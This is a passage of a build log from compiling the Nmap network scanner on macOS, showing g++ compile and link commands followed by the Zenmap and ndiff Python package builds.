  1594. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   idle_scan.cc -o idle_scan.o
  1595. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   MACLookup.cc -o MACLookup.o
  1596. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nmap_dns.cc -o nmap_dns.o
  1597. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nmap_error.cc -o nmap_error.o
  1598. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nmap.cc -o nmap.o
  1599. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nmap_ftp.cc -o nmap_ftp.o
  1600. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   NmapOps.cc -o NmapOps.o
  1601. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   NmapOutputTable.cc -o NmapOutputTable.o
  1602. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nmap_tty.cc -o nmap_tty.o
  1603. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   osscan2.cc -o osscan2.o
  1604. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   osscan.cc -o osscan.o
  1605. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   output.cc -o output.o
  1606. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   payload.cc -o payload.o
  1607. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   portlist.cc -o portlist.o
  1608. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   portreasons.cc -o portreasons.o
  1609. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   protocols.cc -o protocols.o
  1610. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   scan_engine.cc -o scan_engine.o
  1611. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   scan_engine_connect.cc -o scan_engine_connect.o
  1612. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   scan_engine_raw.cc -o scan_engine_raw.o
  1613. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   scan_lists.cc -o scan_lists.o
  1614. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   service_scan.cc -o service_scan.o
  1615. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   services.cc -o services.o
  1616. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   TargetGroup.cc -o TargetGroup.o
  1617. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   Target.cc -o Target.o
  1618. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   targets.cc -o targets.o
  1619. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   tcpip.cc -o tcpip.o
  1620. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   timing.cc -o timing.o
  1621. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   traceroute.cc -o traceroute.o
  1622. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   utils.cc -o utils.o
  1623. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   xml.cc -o xml.o
  1624. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nse_main.cc -o nse_main.o
  1625. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nse_utility.cc -o nse_utility.o
  1626. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nse_nsock.cc -o nse_nsock.o
  1627. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nse_dnet.cc -o nse_dnet.o
  1628. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nse_fs.cc -o nse_fs.o
  1629. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nse_nmaplib.cc -o nse_nmaplib.o
  1630. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nse_debug.cc -o nse_debug.o
  1631. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nse_pcrelib.cc -o nse_pcrelib.o
  1632. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   nse_lpeg.cc -o nse_lpeg.o
  1633. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   main.cc -o main.o
  1634. Compiling nmap
  1635. rm -f nmap
  1636. g++ -Lnbase -Lnsock/src/   -o nmap charpool.o FingerPrintResults.o FPEngine.o FPModel.o idle_scan.o MACLookup.o nmap_dns.o nmap_error.o nmap.o nmap_ftp.o NmapOps.o NmapOutputTable.o nmap_tty.o osscan2.o osscan.o output.o payload.o portlist.o portreasons.o protocols.o scan_engine.o scan_engine_connect.o scan_engine_raw.o scan_lists.o service_scan.o services.o TargetGroup.o Target.o targets.o tcpip.o timing.o traceroute.o utils.o xml.o nse_main.o nse_utility.o nse_nsock.o nse_dnet.o nse_fs.o nse_nmaplib.o nse_debug.o nse_pcrelib.o nse_lpeg.o main.o -lnsock -lnbase libpcre/libpcre.a libpcap/libpcap.a   -lz libnetutil/libnetutil.a ./libdnet-stripped/src/.libs/libdnet.a ./liblua/liblua.a ./liblinear/liblinear.a -lm
  1637. cd zenmap && /usr/bin/python2.7 setup.py build
  1638. running build
  1639. running build_py
  1640. creating build
  1641. creating build/lib
  1642. creating build/lib/zenmapCore
  1643. copying zenmapCore/__init__.py -> build/lib/zenmapCore
  1644. copying zenmapCore/BasePaths.py -> build/lib/zenmapCore
  1645. copying zenmapCore/DelayedObject.py -> build/lib/zenmapCore
  1646. copying zenmapCore/Diff.py -> build/lib/zenmapCore
  1647. copying zenmapCore/I18N.py -> build/lib/zenmapCore
  1648. copying zenmapCore/Name.py -> build/lib/zenmapCore
  1649. copying zenmapCore/NetworkInventory.py -> build/lib/zenmapCore
  1650. copying zenmapCore/NmapCommand.py -> build/lib/zenmapCore
  1651. copying zenmapCore/NmapOptions.py -> build/lib/zenmapCore
  1652. copying zenmapCore/NmapParser.py -> build/lib/zenmapCore
  1653. copying zenmapCore/NSEDocParser.py -> build/lib/zenmapCore
  1654. copying zenmapCore/Paths.py -> build/lib/zenmapCore
  1655. copying zenmapCore/RecentScans.py -> build/lib/zenmapCore
  1656. copying zenmapCore/ScriptArgsParser.py -> build/lib/zenmapCore
  1657. copying zenmapCore/ScriptMetadata.py -> build/lib/zenmapCore
  1658. copying zenmapCore/SearchResult.py -> build/lib/zenmapCore
  1659. copying zenmapCore/StringPool.py -> build/lib/zenmapCore
  1660. copying zenmapCore/TargetList.py -> build/lib/zenmapCore
  1661. copying zenmapCore/UmitConf.py -> build/lib/zenmapCore
  1662. copying zenmapCore/UmitConfigParser.py -> build/lib/zenmapCore
  1663. copying zenmapCore/UmitDB.py -> build/lib/zenmapCore
  1664. copying zenmapCore/UmitLogging.py -> build/lib/zenmapCore
  1665. copying zenmapCore/UmitOptionParser.py -> build/lib/zenmapCore
  1666. copying zenmapCore/Version.py -> build/lib/zenmapCore
  1667. creating build/lib/zenmapGUI
  1668. copying zenmapGUI/__init__.py -> build/lib/zenmapGUI
  1669. copying zenmapGUI/About.py -> build/lib/zenmapGUI
  1670. copying zenmapGUI/App.py -> build/lib/zenmapGUI
  1671. copying zenmapGUI/BugReport.py -> build/lib/zenmapGUI
  1672. copying zenmapGUI/CrashReport.py -> build/lib/zenmapGUI
  1673. copying zenmapGUI/DiffCompare.py -> build/lib/zenmapGUI
  1674. copying zenmapGUI/FileChoosers.py -> build/lib/zenmapGUI
  1675. copying zenmapGUI/FilterBar.py -> build/lib/zenmapGUI
  1676. copying zenmapGUI/Icons.py -> build/lib/zenmapGUI
  1677. copying zenmapGUI/MainWindow.py -> build/lib/zenmapGUI
  1678. copying zenmapGUI/NmapOutputProperties.py -> build/lib/zenmapGUI
  1679. copying zenmapGUI/NmapOutputViewer.py -> build/lib/zenmapGUI
  1680. copying zenmapGUI/OptionBuilder.py -> build/lib/zenmapGUI
  1681. copying zenmapGUI/Print.py -> build/lib/zenmapGUI
  1682. copying zenmapGUI/ProfileCombo.py -> build/lib/zenmapGUI
  1683. copying zenmapGUI/ProfileEditor.py -> build/lib/zenmapGUI
  1684. copying zenmapGUI/ProfileHelp.py -> build/lib/zenmapGUI
  1685. copying zenmapGUI/ScanHostDetailsPage.py -> build/lib/zenmapGUI
  1686. copying zenmapGUI/ScanHostsView.py -> build/lib/zenmapGUI
  1687. copying zenmapGUI/ScanInterface.py -> build/lib/zenmapGUI
  1688. copying zenmapGUI/ScanNmapOutputPage.py -> build/lib/zenmapGUI
  1689. copying zenmapGUI/ScanOpenPortsPage.py -> build/lib/zenmapGUI
  1690. copying zenmapGUI/ScanRunDetailsPage.py -> build/lib/zenmapGUI
  1691. copying zenmapGUI/ScanScanListPage.py -> build/lib/zenmapGUI
  1692. copying zenmapGUI/ScansListStore.py -> build/lib/zenmapGUI
  1693. copying zenmapGUI/ScanToolbar.py -> build/lib/zenmapGUI
  1694. copying zenmapGUI/ScriptInterface.py -> build/lib/zenmapGUI
  1695. copying zenmapGUI/SearchGUI.py -> build/lib/zenmapGUI
  1696. copying zenmapGUI/SearchWindow.py -> build/lib/zenmapGUI
  1697. copying zenmapGUI/TargetCombo.py -> build/lib/zenmapGUI
  1698. copying zenmapGUI/TopologyPage.py -> build/lib/zenmapGUI
  1699. creating build/lib/zenmapGUI/higwidgets
  1700. copying zenmapGUI/higwidgets/__init__.py -> build/lib/zenmapGUI/higwidgets
  1701. copying zenmapGUI/higwidgets/gtkutils.py -> build/lib/zenmapGUI/higwidgets
  1702. copying zenmapGUI/higwidgets/higboxes.py -> build/lib/zenmapGUI/higwidgets
  1703. copying zenmapGUI/higwidgets/higbuttons.py -> build/lib/zenmapGUI/higwidgets
  1704. copying zenmapGUI/higwidgets/higdialogs.py -> build/lib/zenmapGUI/higwidgets
  1705. copying zenmapGUI/higwidgets/higentries.py -> build/lib/zenmapGUI/higwidgets
  1706. copying zenmapGUI/higwidgets/higexpanders.py -> build/lib/zenmapGUI/higwidgets
  1707. copying zenmapGUI/higwidgets/higframe.py -> build/lib/zenmapGUI/higwidgets
  1708. copying zenmapGUI/higwidgets/higlabels.py -> build/lib/zenmapGUI/higwidgets
  1709. copying zenmapGUI/higwidgets/higlogindialogs.py -> build/lib/zenmapGUI/higwidgets
  1710. copying zenmapGUI/higwidgets/hignotebooks.py -> build/lib/zenmapGUI/higwidgets
  1711. copying zenmapGUI/higwidgets/higprogressbars.py -> build/lib/zenmapGUI/higwidgets
  1712. copying zenmapGUI/higwidgets/higscrollers.py -> build/lib/zenmapGUI/higwidgets
  1713. copying zenmapGUI/higwidgets/higspinner.py -> build/lib/zenmapGUI/higwidgets
  1714. copying zenmapGUI/higwidgets/higtables.py -> build/lib/zenmapGUI/higwidgets
  1715. copying zenmapGUI/higwidgets/higtextviewers.py -> build/lib/zenmapGUI/higwidgets
  1716. copying zenmapGUI/higwidgets/higwindows.py -> build/lib/zenmapGUI/higwidgets
  1717. copying zenmapGUI/higwidgets/utils.py -> build/lib/zenmapGUI/higwidgets
  1718. creating build/lib/radialnet
  1719. copying radialnet/__init__.py -> build/lib/radialnet
  1720. creating build/lib/radialnet/bestwidgets
  1721. copying radialnet/bestwidgets/__init__.py -> build/lib/radialnet/bestwidgets
  1722. copying radialnet/bestwidgets/boxes.py -> build/lib/radialnet/bestwidgets
  1723. copying radialnet/bestwidgets/buttons.py -> build/lib/radialnet/bestwidgets
  1724. copying radialnet/bestwidgets/comboboxes.py -> build/lib/radialnet/bestwidgets
  1725. copying radialnet/bestwidgets/expanders.py -> build/lib/radialnet/bestwidgets
  1726. copying radialnet/bestwidgets/frames.py -> build/lib/radialnet/bestwidgets
  1727. copying radialnet/bestwidgets/labels.py -> build/lib/radialnet/bestwidgets
  1728. copying radialnet/bestwidgets/textview.py -> build/lib/radialnet/bestwidgets
  1729. copying radialnet/bestwidgets/windows.py -> build/lib/radialnet/bestwidgets
  1730. creating build/lib/radialnet/core
  1731. copying radialnet/core/__init__.py -> build/lib/radialnet/core
  1732. copying radialnet/core/ArgvHandle.py -> build/lib/radialnet/core
  1733. copying radialnet/core/Coordinate.py -> build/lib/radialnet/core
  1734. copying radialnet/core/Graph.py -> build/lib/radialnet/core
  1735. copying radialnet/core/Info.py -> build/lib/radialnet/core
  1736. copying radialnet/core/Interpolation.py -> build/lib/radialnet/core
  1737. copying radialnet/core/XMLHandler.py -> build/lib/radialnet/core
  1738. creating build/lib/radialnet/gui
  1739. copying radialnet/gui/__init__.py -> build/lib/radialnet/gui
  1740. copying radialnet/gui/Application.py -> build/lib/radialnet/gui
  1741. copying radialnet/gui/ControlWidget.py -> build/lib/radialnet/gui
  1742. copying radialnet/gui/Dialogs.py -> build/lib/radialnet/gui
  1743. copying radialnet/gui/HostsViewer.py -> build/lib/radialnet/gui
  1744. copying radialnet/gui/Image.py -> build/lib/radialnet/gui
  1745. copying radialnet/gui/LegendWindow.py -> build/lib/radialnet/gui
  1746. copying radialnet/gui/NodeNotebook.py -> build/lib/radialnet/gui
  1747. copying radialnet/gui/NodeWindow.py -> build/lib/radialnet/gui
  1748. copying radialnet/gui/RadialNet.py -> build/lib/radialnet/gui
  1749. copying radialnet/gui/SaveDialog.py -> build/lib/radialnet/gui
  1750. copying radialnet/gui/Toolbar.py -> build/lib/radialnet/gui
  1751. creating build/lib/radialnet/util
  1752. copying radialnet/util/__init__.py -> build/lib/radialnet/util
  1753. copying radialnet/util/drawing.py -> build/lib/radialnet/util
  1754. copying radialnet/util/geometry.py -> build/lib/radialnet/util
  1755. copying radialnet/util/integration.py -> build/lib/radialnet/util
  1756. copying radialnet/util/misc.py -> build/lib/radialnet/util
  1757. running build_scripts
  1758. creating build/scripts-2.7
  1759. copying and adjusting zenmap -> build/scripts-2.7
  1760. changing mode of build/scripts-2.7/zenmap from 644 to 755
  1761. cd ndiff && /usr/bin/python2.7 setup.py build
  1762. running build
  1763. running build_py
  1764. creating build
  1765. creating build/lib
  1766. copying ndiff.py -> build/lib
  1767. running build_scripts
  1768. creating build/scripts-2.7
  1769. copying and adjusting scripts/ndiff -> build/scripts-2.7
  1770. changing mode of build/scripts-2.7/ndiff from 644 to 755
  1771. g++ -MM -I../libdnet-stripped/include  -I../libpcap -I../nbase -I../nsock/include ArgParser.cc common.cc common_modified.cc nping.cc NpingOps.cc utils.cc utils_net.cc output.cc stats.cc NpingTargets.cc NpingTarget.cc EchoHeader.cc EchoServer.cc EchoClient.cc ProbeMode.cc NEPContext.cc Crypto.cc > makefile.dep
